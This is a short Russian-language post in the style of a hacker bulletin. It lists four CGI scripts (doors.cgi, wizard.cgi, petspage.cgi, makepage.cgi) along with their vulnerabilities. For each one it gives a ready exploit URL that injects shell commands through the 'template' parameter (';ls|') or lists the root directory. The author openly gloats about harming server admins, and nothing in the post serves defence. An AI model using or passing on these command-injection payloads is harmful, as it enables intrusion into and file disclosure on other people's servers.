Привет.
Настало время поведать вам о новых cgi скриптах. Сегодня у меня радостный день и не очень радостный для админов нескольких серверов. Вот что мне удалось узнать:
Название: doors.cgi
Описание: Скрипт создан для упрощения навигации по сайту.
Уязвимость: Позволяет исполнять команды на удаленном сервере.
Эксплоит: server.com/cgi-bin/doors.cgi?template=;ls|
Название: wizard.cgi
Описание: Это что-то вроде движка для сайта. Используется для облегчения жизни админов.
Уязвимость: Позволяет файлы и директории на диске жертвы.
Эксплоит: server.com/cgi-bin/wizard.cgi?template=;ls|
Следующие два скрипта я решил объеденить, т.к они созданы и используются для одних и
тех же нужд.
Название: petspage.cgi , makepage.cgi
Описание: Созданы скрипты для упрощения навигации по сайту
Уязвимость: Скрипты позволяют делать листинг директории и в некоторых случаях читать файлы.
Эксплоит: server.com/cgi-bin/makepage.cgi?template=/|&columnname=id
server.com/cgi-bin/petspage.cgi?template=;ls|
Конец.
